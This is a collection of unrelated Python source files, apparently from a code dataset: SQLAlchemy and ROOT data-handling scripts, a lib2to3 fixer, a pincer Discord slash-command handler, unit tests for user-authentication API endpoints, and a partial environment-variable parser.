if jatm >= 0:
iatm = bond1.getNbrAtomIdx(jatm)
katm = bond2.getNbrAtomIdx(jatm)
yield angle.Angle(iatm, jatm, katm)
# specialized options to extract information stored in
# other classes related to molecule
def getCoordinates(self):
""" Returns a numpy array with all the coordinates
of all the atoms in the molecule
"""
c = numpy.zeros((self.getNumAtoms(), 3))
for iat, _atom in enumerate(self.getAtoms()):
c[iat] = _atom.getCoordinate()
return c
def setCoordinates(self, c):
""" Sets the coordinates of all atoms in the molecule from
the numpy array
"""
assert isinstance(c, numpy.ndarray)
(n,k) = numpy.shape(c)
assert n == self.getNumAtoms()
for iat, _atom in enumerate(self.getAtoms()):
_atom.setCoordinate(c[iat])
|
StarcoderdataPython
|
190060
|
<reponame>LegitStack/knot
from .config import get, put, env, project_path
|
StarcoderdataPython
|
3282677
|
"""Illustrate a "three way join" - where a primary table joins to a remote
table via an association table, but then the primary table also needs
to refer to some columns in the remote table directly.
E.g.::
first.first_id -> second.first_id
second.other_id --> partitioned.other_id
first.partition_key ---------------------> partitioned.partition_key
For a relationship like this, "second" is a lot like a "secondary" table,
but the mechanics aren't present within the "secondary" feature to allow
for the join directly between first and partitioned. Instead, we
will derive a selectable from partitioned and second combined together, then
link first to that derived selectable.
If we define the derived selectable as::
second JOIN partitioned ON second.other_id = partitioned.other_id
A JOIN from first to this derived selectable is then::
first JOIN (second JOIN partitioned
ON second.other_id = partitioned.other_id)
ON first.first_id = second.first_id AND
first.partition_key = partitioned.partition_key
We will use the "non primary mapper" feature in order to produce this.
A non primary mapper is essentially an "extra" :func:`.mapper` that we can
use to associate a particular class with some selectable that is
not its usual mapped table. It is used only when called upon within
a Query (or a :func:`.relationship`).
"""
from sqlalchemy import *
from sqlalchemy.orm import *
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class First(Base):
__tablename__ = 'first'
first_id = Column(Integer, primary_key=True)
partition_key = Column(String)
def __repr__(self):
return ("First(%s, %s)" % (self.first_id, self.partition_key))
class Second(Base):
__tablename__ = 'second'
first_id = Column(Integer, primary_key=True)
other_id = Column(Integer, primary_key=True)
class Partitioned(Base):
__tablename__ = 'partitioned'
other_id = Column(Integer, primary_key=True)
partition_key = Column(String, primary_key=True)
def __repr__(self):
return ("Partitioned(%s, %s)" % (self.other_id, self.partition_key))
j = join(Partitioned, Second, Partitioned.other_id == Second.other_id)
partitioned_second = mapper(Partitioned, j, non_primary=True, properties={
# note we need to disambiguate columns here - the join()
# will provide them as j.c.<tablename>_<colname> for access,
# but they retain their real names in the mapping
"other_id": [j.c.partitioned_other_id, j.c.second_other_id],
})
First.partitioned = relationship(
partitioned_second,
primaryjoin=and_(
First.partition_key == partitioned_second.c.partition_key,
First.first_id == foreign(partitioned_second.c.first_id)
), innerjoin=True)
# when using any database other than SQLite, we will get a nested
# join, e.g. "first JOIN (partitioned JOIN second ON ..) ON ..".
# On SQLite, SQLAlchemy needs to render a full subquery.
e = create_engine("sqlite://", echo=True)
Base.metadata.create_all(e)
s = Session(e)
s.add_all([
First(first_id=1, partition_key='p1'),
First(first_id=2, partition_key='p1'),
First(first_id=3, partition_key='p2'),
Second(first_id=1, other_id=1),
Second(first_id=2, other_id=1),
Second(first_id=3, other_id=2),
Partitioned(partition_key='p1', other_id=1),
Partitioned(partition_key='p1', other_id=2),
Partitioned(partition_key='p2', other_id=2),
])
s.commit()
for row in s.query(First, Partitioned).join(First.partitioned):
print(row)
for f in s.query(First):
for p in f.partitioned:
print(f.partition_key, p.partition_key)
|
StarcoderdataPython
|
8024352
|
<gh_stars>0
#!/usr/bin/env python3
#
# Author: <NAME>
# License: BSD 2-clause
# Last Change: Mon Aug 16, 2021 at 06:04 PM +0200
import ROOT
ROOT.PyConfig.IgnoreCommandLineOptions = True # Don't hijack argparse!
ROOT.PyConfig.DisableRootLogon = True # Don't read .rootlogon.py
from argparse import ArgumentParser
from os.path import basename, splitext, join
from ROOT import gInterpreter, RDataFrame
################################
# Command line argument parser #
################################
def parse_input():
parser = ArgumentParser(description='''
Split a single ntuple into train, validation, and test ntuples based on the
given train/validation ratios.
''')
parser.add_argument('ntp', help='input ntuple.')
parser.add_argument('tree', help='input tree.')
parser.add_argument('-d', '--debug',
action='store_true',
help='enable debug output.')
parser.add_argument('-o', '--output-dir',
default='.',
help='output directory.')
parser.add_argument('-T', '--train-ratio',
type=int,
default=35,
help='specify train ntuple ratio.')
parser.add_argument('-V', '--validation-ratio',
type=int,
default=35,
help='specify validation ntuple ratio.')
parser.add_argument('--seed',
default='42',
help='specify random seed.')
return parser.parse_args()
###########
# Helpers #
###########
def get_filename(path):
return basename(splitext(path)[0])
def get_cuts(train, validation, br='rand_split'):
return {
'train': '{lb} <= {br} && {br} < {ub}'.format(
br=br, lb=0, ub=train),
'valid': '{lb} <= {br} && {br} < {ub}'.format(
br=br, lb=train, ub=train+validation),
'test': '{lb} <= {br} && {br} <= {ub}'.format(
br=br, lb=train+validation, ub=100)
}
########
# Main #
########
if __name__ == '__main__':
args = parse_input()
gInterpreter.Declare('auto rand_gen = TRandom3({});'.format(args.seed))
init_frame = RDataFrame(args.tree, args.ntp)
rand_frame = init_frame.Define('rand_split', 'rand_gen.Uniform(0, 100)')
if args.debug:
print('loaded {} with {} entries'.format(
args.ntp, rand_frame.Count().GetValue()))
cuts = get_cuts(args.train_ratio, args.validation_ratio)
for sample, cut in cuts.items():
subsample_frame = rand_frame.Filter(cut)
output_ntp = join(args.output_dir, '{}_{}.root'.format(
get_filename(args.ntp), sample))
subsample_frame.Snapshot(args.tree, output_ntp)
if args.debug:
print('sample: {}, cuts: {}'.format(sample, cut))
print('wrote {} with {} entries'.format(
output_ntp, subsample_frame.Count().GetValue()))
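
# Illustrative usage, not part of the original script (file and tree names are
# placeholders):
#
#   $ python split.py input.root tree -T 35 -V 35 -o output/ --debug
#
# With the default ratios this writes input_train.root, input_valid.root and
# input_test.root, holding roughly 35%, 35% and 30% of the entries.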
|
StarcoderdataPython
|
9685779
|
"""
Fixer for method.__X__ -> method.im_X
"""
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name
MAP = {
"__func__" : "im_func",
"__self__" : "im_self"
# Fortunately, im_self.__class__ == im_class in 2.5.
}
class FixMethodattrs(fixer_base.BaseFix):
PATTERN = """
power< any+ trailer< '.' attr=('__func__' | '__self__') > any* >
"""
def transform(self, node, results):
attr = results["attr"][0]
new = str(MAP[attr.value])
attr.replace(Name(new, prefix=attr.prefix))
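
# Illustrative sketch, not part of the original fixer: the rewrite it performs
# (the surrounding code is hypothetical).
#
#   before:  handler = obj.method.__func__
#   after:   handler = obj.method.im_func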
|
StarcoderdataPython
|
1672931
|
"""
This module contains submodules for generating the sampling grid
coordinates on which to propagate the acoustic field.
"""
__all__ = [
'abstract_sampler',
'clist_sampler',
'hexagonal_sampler',
'lambert_sampler',
'rectilinear_sampler'
]
|
StarcoderdataPython
|
1735263
|
# -*- coding: utf-8 -*-
from django.contrib import admin
from . import models
# Register your models here.
class ProjectsInLine(admin.TabularInline):
# inherits from Tabular inline so Projects can appear as a table on the user page
model = models.Project
extra = 0
@admin.register(models.Profile)
class ProfileAdmin(admin.ModelAdmin):
# display three columns, third will be from _projects function
list_display = ("username", "interaction", "_projects")
search_fields = ["user__username"]
inlines = [
ProjectsInLine
]
def _projects(self, obj):
# counts no. of projects for a particular profile, used in display
return obj.projects.all().count()
|
StarcoderdataPython
|
3254792
|
<reponame>jeffersonraimon/Programming-UFBA
E, P =input().split()
E = int(E)
P = int(P)
cont = E - P
contador = 1
contadorP = P - 1
if contadorP > 0:
while cont > 0:
cont = cont - contadorP
contador = contador + 1
if contadorP <= 0:
print("F")
break
contadorP = contadorP - 1
else:
print(contador)
else:
print("F")
|
StarcoderdataPython
|
5091380
|
<filename>r/pandas.py
import copy
from rpy2.robjects import pandas2ri, numpy2ri
import rpy2.robjects.conversion as conversion
from rpy2.robjects import r
OTHER_DEFAULT_CONVERSIONS = {
# R (str) : Python type
"NULL": type(None),
}
def automatic_pandas_conversion(**other_conversions):
"""Automatically convert between pandas and R objects according to rpy2-pandas2ri.
    This is based on the pandas2ri.activate function that will be deprecated soon.

    Arguments
    ---------
    **other_conversions : str : object
        Additional conversions between Python objects and R, given as
        R code (str): Python type.
    """
    # Merge the defaults with the user-supplied conversions without shadowing
    # the `other_conversions` argument.
    merged_conversions = copy.deepcopy(OTHER_DEFAULT_CONVERSIONS)
    merged_conversions.update(other_conversions)
new_converter = conversion.Converter('snapshot before pandas conversion',
template=conversion.converter)
npc, pdc = numpy2ri.py2rpy.registry.items(), pandas2ri.py2rpy.registry.items()
for k, v in list(npc) + list(pdc):
if k is object:
continue
new_converter.py2rpy.register(k, v)
# other conversions
    for rcode, p in merged_conversions.items():
        # bind rcode at definition time to avoid the late-binding closure pitfall
        new_converter.py2rpy.register(p, lambda x, rcode=rcode: r(rcode))
npc, pdc = numpy2ri.rpy2py.registry.items(), pandas2ri.rpy2py.registry.items()
for k, v in list(npc) + list(pdc):
if k is object:
continue
new_converter.rpy2py.register(k, v)
# other conversions
    for rcode, p in merged_conversions.items():
        # bind p at definition time to avoid the late-binding closure pitfall
        new_converter.rpy2py.register(r(rcode), lambda x, p=p: p)
conversion.set_conversion(new_converter)
return
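

def _example_automatic_conversion():
    # Illustrative sketch, not part of the original module: enable the converter
    # and hand a pandas DataFrame straight to R code. Assumes pandas and a
    # working R installation; behaviour may vary with the rpy2 version.
    import pandas as pd
    from rpy2.robjects import globalenv
    automatic_pandas_conversion()
    globalenv["df"] = pd.DataFrame({"x": [1.0, 2.0, 3.0]})
    return r("summary(df)")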
|
StarcoderdataPython
|
1941780
|
<filename>pincer/commands.py
# Copyright Pincer 2021-Present
# Full MIT License can be found in `LICENSE` at the project root.
from __future__ import annotations
import logging
import re
from asyncio import iscoroutinefunction, gather
from copy import deepcopy
from inspect import Signature, isasyncgenfunction
from typing import (
Optional, Dict, List, Any, Tuple, get_origin, get_args, Union,
ForwardRef, _eval_type
)
from . import __package__
from .exceptions import (
CommandIsNotCoroutine, CommandAlreadyRegistered, TooManyArguments,
InvalidAnnotation, CommandDescriptionTooLong, InvalidCommandGuild,
InvalidCommandName
)
from .objects import ThrottleScope, AppCommand, Role, User, Channel, Guild
from .objects.app import (
AppCommandOptionType, AppCommandOption, AppCommandOptionChoice,
ClientCommandStructure, AppCommandType
)
from .utils import (
get_signature_and_params, get_index, should_pass_ctx, Coro, Snowflake,
MISSING, choice_value_types, Choices
)
from .utils.types import Singleton, TypeCache, Descripted
COMMAND_NAME_REGEX = re.compile(r"^[\w-]{1,32}$")
_log = logging.getLogger(__package__)
_options_type_link = {
# TODO: Implement mentionable:
Signature.empty: AppCommandOptionType.STRING,
str: AppCommandOptionType.STRING,
int: AppCommandOptionType.INTEGER,
bool: AppCommandOptionType.BOOLEAN,
float: AppCommandOptionType.NUMBER,
User: AppCommandOptionType.USER,
Channel: AppCommandOptionType.CHANNEL,
Role: AppCommandOptionType.ROLE,
}
def command(
name: Optional[str] = None,
description: Optional[str] = "Description not set",
enable_default: Optional[bool] = True,
guild: Union[Snowflake, int, str] = None,
cooldown: Optional[int] = 0,
cooldown_scale: Optional[float] = 60,
cooldown_scope: Optional[ThrottleScope] = ThrottleScope.USER
):
"""
    Command option types are designated by using type hints:

        str                    - String
        int                    - Integer
        bool                   - Boolean
        float                  - Number
        pincer.objects.User    - User
        pincer.objects.Channel - Channel
        pincer.objects.Role    - Role

    Mentionable is not implemented.
"""
# TODO: Fix docs
# TODO: Fix docs w guild
# TODO: Fix docs w cooldown
# TODO: Fix docs w context
# TODO: Fix docs w argument descriptions
# TODO: Fix docs w argument choices
def decorator(func: Coro):
if not iscoroutinefunction(func) and not isasyncgenfunction(func):
raise CommandIsNotCoroutine(
f"Command with call `{func.__name__}` is not a coroutine, "
"which is required for commands."
)
cmd = name or func.__name__
if not re.match(COMMAND_NAME_REGEX, cmd):
raise InvalidCommandName(
f"Command `{cmd}` doesn't follow the name requirements."
"Ensure to match the following regex:"
f" {COMMAND_NAME_REGEX.pattern}"
)
try:
guild_id = int(guild) if guild else MISSING
except ValueError:
            raise InvalidCommandGuild(
                f"The `guild` parameter of command `{func.__name__}` "
                "is not a valid guild id."
            )
if len(description) > 100:
            raise CommandDescriptionTooLong(
                f"The description of command `{cmd}` (`{func.__name__}`) "
                "exceeds the 100 character limit."
            )
if reg := ChatCommandHandler.register.get(cmd):
raise CommandAlreadyRegistered(
f"Command `{cmd}` (`{func.__name__}`) has already been "
f"registered by `{reg.call.__name__}`."
)
sig, params = get_signature_and_params(func)
pass_context = should_pass_ctx(sig, params)
if len(params) > (25 + pass_context):
raise TooManyArguments(
f"Command `{cmd}` (`{func.__name__}`) can only have 25 "
f"arguments (excluding the context and self) yet {len(params)} "
"were provided!"
)
options: List[AppCommandOption] = []
for idx, param in enumerate(params):
if idx == 0 and pass_context:
continue
annotation, required = sig[param].annotation, True
argument_description: Optional[str] = None
choices: List[AppCommandOptionChoice] = []
if isinstance(annotation, str):
TypeCache()
annotation = eval(annotation, TypeCache.cache, globals())
if isinstance(annotation, Descripted):
argument_description = annotation.description
annotation = annotation.key
if len(argument_description) > 100:
raise CommandDescriptionTooLong(
f"Tuple annotation `{annotation}` on parameter "
f"`{param}` in command `{cmd}` (`{func.__name__}`), "
"argument description too long. (maximum length is 100 "
"characters)"
)
if get_origin(annotation) is Union:
args = get_args(annotation)
if type(None) in args:
required = False
# Do NOT use isinstance as this is a comparison between
# two values of the type type and isinstance does NOT
# work here.
union_args = [t for t in args if t is not type(None)]
annotation = (
get_index(union_args, 0)
if len(union_args) == 1
else Union[Tuple[List]]
)
if get_origin(annotation) is Choices:
args = get_args(annotation)
if len(args) > 25:
raise InvalidAnnotation(
f"Choices/Literal annotation `{annotation}` on "
f"parameter `{param}` in command `{cmd}` "
f"(`{func.__name__}`) amount exceeds limit of 25 items!"
)
choice_type = type(args[0])
if choice_type is Descripted:
choice_type = type(args[0].key)
for choice in args:
choice_description = choice
if isinstance(choice, Descripted):
choice_description = choice.description
choice = choice.key
if choice_type is tuple:
choice_type = type(choice)
if type(choice) not in choice_value_types:
# Properly get all the names of the types
valid_types = list(map(
lambda x: x.__name__,
choice_value_types
))
raise InvalidAnnotation(
f"Choices/Literal annotation `{annotation}` on "
f"parameter `{param}` in command `{cmd}` "
f"(`{func.__name__}`), invalid type received. "
"Value must be a member of "
f"{', '.join(valid_types)} but "
f"{type(choice).__name__} was given!"
)
elif not isinstance(choice, choice_type):
raise InvalidAnnotation(
f"Choices/Literal annotation `{annotation}` on "
f"parameter `{param}` in command `{cmd}` "
f"(`{func.__name__}`), all values must be of the "
"same type!"
)
choices.append(AppCommandOptionChoice(
name=choice_description,
value=choice
))
annotation = choice_type
param_type = _options_type_link.get(annotation)
if not param_type:
raise InvalidAnnotation(
f"Annotation `{annotation}` on parameter "
f"`{param}` in command `{cmd}` (`{func.__name__}`) is not "
"a valid type."
)
options.append(
AppCommandOption(
type=param_type,
name=param,
description=argument_description or "Description not set",
required=required,
choices=choices or MISSING
)
)
ChatCommandHandler.register[cmd] = ClientCommandStructure(
call=func,
cooldown=cooldown,
cooldown_scale=cooldown_scale,
cooldown_scope=cooldown_scope,
app=AppCommand(
name=cmd,
description=description,
type=AppCommandType.CHAT_INPUT,
default_permission=enable_default,
options=options,
guild_id=guild_id
)
)
_log.info(f"Registered command `{cmd}` to `{func.__name__}`.")
return func
return decorator
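

# Illustrative sketch, not part of the original module: how a chat command might
# be declared with the decorator above (names, ids and the return value are
# hypothetical).
#
#   @command(name="echo", description="Repeat a message.", guild=1234567890)
#   async def echo(self, ctx, message: str):
#       return message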
class ChatCommandHandler(metaclass=Singleton):
"""
Class containing methods used to handle various commands
"""
managers: Dict[str, Any] = {}
register: Dict[str, ClientCommandStructure] = {}
# Endpoints:
__get = "/commands"
__delete = "/commands/{command.id}"
__update = "/commands/{command.id}"
__add = "/commands"
__add_guild = "/guilds/{command.guild_id}/commands"
__get_guild = "/guilds/{guild_id}/commands"
__update_guild = "/guilds/{command.guild_id}/commands/{command.id}"
__delete_guild = "/guilds/{command.guild_id}/commands/{command.id}"
# TODO: Fix docs
def __init__(self, client):
# TODO: Fix docs
self.client = client
self._api_commands: List[AppCommand] = []
logging.debug(
"%i commands registered.",
len(ChatCommandHandler.register.items())
)
self.client.throttler.throttle = dict(map(
lambda cmd: (cmd.call, {}),
ChatCommandHandler.register.values()
))
self.__prefix = f"applications/{self.client.bot.id}"
async def get_commands(self) -> List[AppCommand]:
# TODO: Fix docs
# TODO: Update if discord adds bulk get guild commands
guild_commands = await gather(*map(
lambda guild: self.client.http.get(
self.__prefix + self.__get_guild.format(
guild_id=guild.id if isinstance(guild, Guild) else guild
)
),
self.client.guilds
))
return list(map(
AppCommand.from_dict,
await self.client.http.get(self.__prefix + self.__get)
+ [cmd for guild in guild_commands for cmd in guild]
))
async def remove_command(self, cmd: AppCommand, keep=False):
# TODO: Fix docs
# TODO: Update if discord adds bulk delete commands
remove_endpoint = self.__delete_guild if cmd.guild_id else self.__delete
await self.client.http.delete(
self.__prefix + remove_endpoint.format(command=cmd)
)
if not keep and ChatCommandHandler.register.get(cmd.name):
del ChatCommandHandler.register[cmd.name]
async def remove_commands(
self,
commands: List[AppCommand],
/,
keep: List[AppCommand] = None
):
# TODO: Fix docs
await gather(*list(map(
lambda cmd: self.remove_command(cmd, cmd in (keep or [])),
commands
)))
async def update_command(self, cmd: AppCommand, changes: Dict[str, Any]):
# TODO: Fix docs
# TODO: Update if discord adds bulk update commands
update_endpoint = self.__update_guild if cmd.guild_id else self.__update
await self.client.http.patch(
self.__prefix + update_endpoint.format(command=cmd),
data=changes
)
for key, value in changes.items():
setattr(ChatCommandHandler.register[cmd.name], key, value)
async def update_commands(
self,
to_update: Dict[AppCommand, Dict[str, Any]]
):
# TODO: Fix docs
await gather(*list(map(
lambda cmd: self.update_command(cmd[0], cmd[1]),
to_update.items()
)))
async def add_command(self, cmd: AppCommand):
# TODO: Fix docs
add_endpoint = self.__add
if cmd.guild_id:
add_endpoint = self.__add_guild.format(command=cmd)
res = await self.client.http.post(
self.__prefix + add_endpoint,
data=cmd.to_dict()
)
ChatCommandHandler.register[cmd.name].app.id = Snowflake(res['id'])
async def add_commands(self, commands: List[AppCommand]):
# TODO: Fix docs
await gather(*list(map(
lambda cmd: self.add_command(cmd),
commands
)))
async def __init_existing_commands(self):
# TODO: Fix docs
self._api_commands = await self.get_commands()
for api_cmd in self._api_commands:
cmd = ChatCommandHandler.register.get(api_cmd.name)
if cmd and cmd.app == api_cmd:
cmd.app = api_cmd
async def __remove_unused_commands(self):
"""
Remove commands that are registered by discord but not in use
by the current client!
"""
registered_commands = list(map(
lambda registered_cmd: registered_cmd.app,
ChatCommandHandler.register.values()
))
keep = []
def predicate(target: AppCommand) -> bool:
for reg_cmd in registered_commands:
reg_cmd: AppCommand = reg_cmd
if target == reg_cmd:
return False
elif target.name == reg_cmd.name:
keep.append(target)
return True
to_remove = list(filter(predicate, self._api_commands))
await self.remove_commands(to_remove, keep=keep)
self._api_commands = list(filter(
lambda cmd: cmd not in to_remove,
self._api_commands
))
async def __update_existing_commands(self):
"""
Update all commands where its structure doesn't match the
structure that discord has registered.
"""
to_update: Dict[AppCommand, Dict[str, Any]] = {}
def get_changes(
api: AppCommand,
local: AppCommand
) -> Dict[str, Any]:
update: Dict[str, Any] = {}
if api.description != local.description:
update["description"] = local.description
if api.default_permission != local.default_permission:
update["default_permission"] = local.default_permission
options: List[Dict[str, Any]] = []
if api.options is not MISSING:
if len(api.options) == len(local.options):
def get_option(args: Tuple[int, Any]) \
-> Optional[Dict[str, Any]]:
index, api_option = args
if opt := get_index(local.options, index):
return opt.to_dict()
options = list(filter(
lambda opt: opt is not None,
map(get_option, enumerate(api.options))
))
else:
options = local.options
if api.options is not MISSING and list(
map(AppCommandOption.from_dict, options)) != api.options:
update["options"] = options
return update
for idx, api_cmd in enumerate(self._api_commands):
for loc_cmd in ChatCommandHandler.register.values():
if api_cmd.name != loc_cmd.app.name:
continue
changes = get_changes(api_cmd, loc_cmd.app)
if not changes:
continue
api_update = []
if changes.get("options"):
for option in changes["options"]:
api_update.append(
option.to_dict()
if isinstance(option, AppCommandOption)
else option
)
to_update[api_cmd] = {"options": api_update}
for key, change in changes.items():
if key == "options":
self._api_commands[idx].options = list(map(
AppCommandOption.from_dict,
change
))
else:
setattr(self._api_commands[idx], key, change)
await self.update_commands(to_update)
async def __add_commands(self):
"""
Add all new commands which have been registered by the decorator
to Discord!
"""
to_add = deepcopy(ChatCommandHandler.register)
for reg_cmd in self._api_commands:
try:
del to_add[reg_cmd.name]
            except KeyError:
pass
await self.add_commands(list(map(
lambda cmd: cmd.app,
to_add.values()
)))
async def initialize(self):
# TODO: Fix docs
await self.__init_existing_commands()
await self.__remove_unused_commands()
await self.__update_existing_commands()
await self.__add_commands()
|
StarcoderdataPython
|
5094039
|
import json
from tests.TestingSuite import BaseTestingSuite
class TestUsersResource(BaseTestingSuite):
def setUp(self):
print('Testing Users resources...')
super().setUp()
self.user_payload = json.dumps({
"email": "<EMAIL>",
"password": "password"
})
def test_successful_grab_users(self):
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.get('/api/auth/users',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
})
self.assertEqual({
"email": "<EMAIL>",
"full_name": "Administrator",
"role": "admin"
}, response.json['users'][0])
self.assertEqual(200, response.status_code)
def test_bad_permissions_grab_users(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": '<PASSWORD>',
'full_name': 'test_user'
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
})).json['jwt_token']
response = self.app.get('/api/auth/users',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
})
self.assertEqual('Invalid token.', response.json['message'])
self.assertEqual(403, response.status_code)
def test_successful_delete_user(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.delete('/api/auth/users',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'email': '<EMAIL>'
}))
self.assertEqual('Successfully deleted <EMAIL> from database', response.json['message'])
self.assertEqual(200, response.status_code)
def test_bad_permissions_delete_user(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json',
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload).json['jwt_token']
response= self.app.delete('/api/auth/users',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'email': '<EMAIL>'
}))
self.assertEqual('Invalid token.', response.json['message'])
self.assertEqual(403, response.status_code)
def test_bad_schema_error_delete_user(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.delete('/api/auth/users',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'bad_key': '<EMAIL>'
}))
self.assertEqual('Request is missing required fields.', response.json['message'])
self.assertEqual(400, response.status_code)
def test_email_dne_error_delete_user(self):
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.delete('/api/auth/users',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
"email": "<EMAIL>"
}))
self.assertEqual("Couldn't find the user with given email address.", response.json['message'])
self.assertEqual(400, response.status_code)
def test_successful_user_role_update(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
"email": "<EMAIL>",
"new_role": "admin"
}))
self.assertEqual({
'email': '<EMAIL>',
'full_name': 'test_user',
'role': 'admin'
}, response.json['user'])
self.assertEqual(200, response.status_code)
def test_bad_permissions_user_role_update(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
"email": "<EMAIL>",
"new_role": "admin"
}))
self.assertEqual('Invalid token.', response.json['message'])
self.assertEqual(403, response.status_code)
def test_email_dne_error_update_user_role(self):
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
"email": "<EMAIL>",
"new_role": "admin"
}))
self.assertEqual("Couldn't find the user with given email address.", response.json['message'])
self.assertEqual(400, response.status_code)
def test_bad_schema_error_update_user_role(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'bad_key': '<EMAIL>',
'new_role': 'admin'
}))
self.assertEqual('Request is missing required fields.', response.json['message'])
self.assertEqual(400, response.status_code)
def test_role_dne_error_update_user_role(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'email': '<EMAIL>',
'new_role': 'rolethatdoesnotexist'
}))
self.assertEqual('That role does not exist.', response.json['message'])
self.assertEqual(400, response.status_code)
def test_successful_user_password_update(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post("/api/auth/signup",
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update/password',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'password': '<PASSWORD>',
'new_password': '<PASSWORD>'
}))
self.assertEqual('<EMAIL> password was updated', response.json['description'])
self.assertEqual(200, response.status_code)
def test_bad_schema_error_user_password_update(self):
test_user_payload = json.dumps({
'email': '<EMAIL>',
'password': '<PASSWORD>',
'full_name': 'test_user'
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update/password',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'password': '<PASSWORD>',
'bad_key': 'badbadbad'
}))
self.assertEqual('Request is missing required fields.', response.json['message'])
self.assertEqual(400, response.status_code)
def test_unauthorized_password_user_password_update(self):
test_user_payload = json.dumps({
'email': '<EMAIL>',
'password': '<PASSWORD>',
'full_name': 'test_user'
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update/password',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'password': '<PASSWORD>',
'new_password': '<PASSWORD>'
}))
|
StarcoderdataPython
|
9671689
|
<filename>kluctl/utils/env_config_sets.py
import os
import re
def parse_env_config_sets(prefix):
r = re.compile(r"%s_(\d+)_(.*)" % prefix)
r2 = re.compile(r"%s_(.*)" % prefix)
ret = {}
for env_name, env_value in os.environ.items():
m = r.fullmatch(env_name)
if m:
idx = m.group(1)
key = m.group(2)
ret.setdefault(idx, {})[key] = env_value
else:
m = r2.fullmatch(env_name)
if m:
key = m.group(1)
ret.setdefault(None, {})[key] = env_value
return ret
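

def _example_parse_env_config_sets():
    # Illustrative sketch, not part of the original module: indexed variables are
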